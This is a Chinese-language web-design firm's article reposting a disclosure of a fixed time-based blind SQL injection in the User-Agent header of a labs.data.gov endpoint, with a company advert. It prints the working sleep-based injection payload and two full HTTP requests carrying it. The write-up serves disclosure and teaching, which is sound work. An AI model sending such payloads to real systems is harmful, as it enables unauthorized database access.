网站建设资讯

NEWS

网站建设资讯

如何分析HTTP头注入中的User-Agent注入

如何分析 HTTP头注入中的User-Agent注入,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

成都创新互联公司从2013年成立,是专业互联网技术服务公司,拥有项目成都网站制作、网站建设、外贸网站建设网站策划,项目实施与项目整合能力。我们以让每一个梦想脱颖而出为使命,1280元若羌做网站,已为上家服务,为若羌各地企业和个人服务,联系电话:18982081108


漏洞信息
发现者:harisec

漏洞种类:SQL注入

危害等级:严重

漏洞状态:已修复


前言
Harisec在以下网站中发现一个SQL注入漏洞,注入的位置在User-Agent。
https://labs.data.gov/dashboard/datagov/csv_to_json

漏洞再现
Harisec使用了盲注的方式来确认该漏洞

例如:将User-Agent的值设置为

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

将导致服务器在25秒后响应

这里,我们看一下具体的数据包内容

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP头注入中的User-Agent注入

服务器在25秒后响应,与User-Agent的值相同

将User-Agent的值改一下,改成9秒后响应

GET /dashboard/datagov/csv_to_json HTTP/1.1Referer: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(3*3),0))OR'X-Forwarded-For: 1X-Requested-With: XMLHttpRequestHost: labs.data.govConnection: Keep-aliveAccept-Encoding: gzip,deflateAccept: */*

如何分析 HTTP头注入中的User-Agent注入


漏洞影响

该漏洞可以使攻击者注入恶意的SQL语句。

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注创新互联行业资讯频道,感谢您对创新互联的支持。


文章题目:如何分析HTTP头注入中的User-Agent注入
文章网址:http://cdweb.net/article/jppsjg.html